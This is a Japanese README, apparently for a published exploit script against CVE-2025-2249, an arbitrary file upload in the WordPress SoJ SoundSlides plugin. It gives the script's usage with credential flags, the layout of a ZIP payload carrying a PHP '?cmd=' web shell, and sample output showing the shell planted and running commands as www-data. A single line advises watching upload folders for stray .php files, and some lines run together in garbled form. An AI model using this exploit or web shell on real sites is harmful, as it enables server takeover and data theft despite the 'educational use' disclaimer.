
WordPress SoJ SoundSlides プラグイン <= 1.2.2 は任意のファイルアップロードに対して脆弱です。
⚠️ 免責事項: このエクスプロイトは教育目的および許可されたテスト目的のみに使用してください。
SoJ SoundSlides プラグインは、投稿者(Contributor)以上の権限を持つ認証済みユーザーによる任意の ZIP ファイルのアップロードを許可します。検証が欠如しているため、攻撃者は PHP ウェブシェルをアップロードし、それが Web アクセス可能なディレクトリに展開されて実行される可能性があります。
有効な WordPress 認証情報を持つ攻撃者は、以下を実行できます。
?cmd=)usage: CVE-2025-2249.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit for CVE-2025-2249 | WordPress SoJ SoundSlides Plugin # By Nxploited | Khaled ALenazi,
options:
-h, --help show this help message and exit
-u, --url URL WordPress base URL
-un, --username USERNAME
WordPress username
-p, --password PASSWORD
WordPress password
| 引数 | 説明 |
|---|---|
-u | WordPress ベース URL |
-un | WordPress ユーザー名 |
-p | WordPress パスワード |
readme.txt からバージョンを確認nxploit/
├── index.html
├── data/
│ └── data.xml
├── audio/
│ └── audio.mp3
└── nxploit.php ← PHP shell (?cmd=)
[*] Checking plugin version...
[+] Vulnerable version detected.
[*] Logging in...
[+] Login successful.
[*] Uploading shell...
[*] Shell uploaded: http://target/wp-content/uploads/SoundSlides/nxploit_shell/nxploit.php
> whoami
www-data
wp-content/uploads/ に予期しない .php ファイルがないか監視する❤️ を込めて [Nxploited | Khaled ALenazi] が制作
教育、啓発、そして防御のために。
セキュリティはすべての人の責任です。常に倫理的にテストし、責任を持って報告し、Web を守りましょう。